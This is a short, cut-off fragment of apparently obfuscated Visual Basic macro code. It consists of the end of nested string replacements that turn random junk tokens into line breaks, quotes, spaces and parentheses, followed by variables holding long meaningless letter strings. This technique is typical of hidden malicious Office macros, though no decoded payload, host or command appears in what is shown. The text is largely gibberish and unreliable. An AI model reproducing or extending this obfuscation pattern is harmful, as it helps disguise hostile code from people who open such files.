KFnHXHcFFuoAWUiEaYAJKFnHXHcFF"),"FFcHXHnFKJAYaEiUWAou",vbCrLf),"vlVcFkZGBGTuyERAIPWD",""""),"bNgvgJJKClnBZhuODTSrrRyTdOew"," "),"lcZfXnnjbnpYOdWYSDpS","("),"VJfgggvFzGlgJnkqeTORoPSDtuOWRQ",")"))
nkLvCjffjCbgSWWRAaToRQRt = "bckghVGchnGJFklkGLXcmcfJFfjHJFGnxVcnnNzvxLLfnlchfioyrprTwOSueTYetiisaREpowyutRSaidSsIpWtRuSDRiqEtD"
zzGkJfGVnbIQpwrTpQRR = "mjBCkVJMvBbZGcBFllKXzJLKVKGlkMmLcFKXJrqipDQwrdPayDRAPuWQERYeodRUQtpaWTTRuI"
ZNmHhZcXwODoAyoA = "NLKcJNnMgzjZGZXKmlFhFvzCghKBNBJJxvMcBvueouieUTQEyedIuUSrQPdOYorqaOSrwERetOOr"
jCLmHJFzNwqAATPqEs = "jhBczgmzLNJzzBvcjLCCCZzXfbbKjxLEataSraiWiUdwPWApDwaiEdEaWIATdo"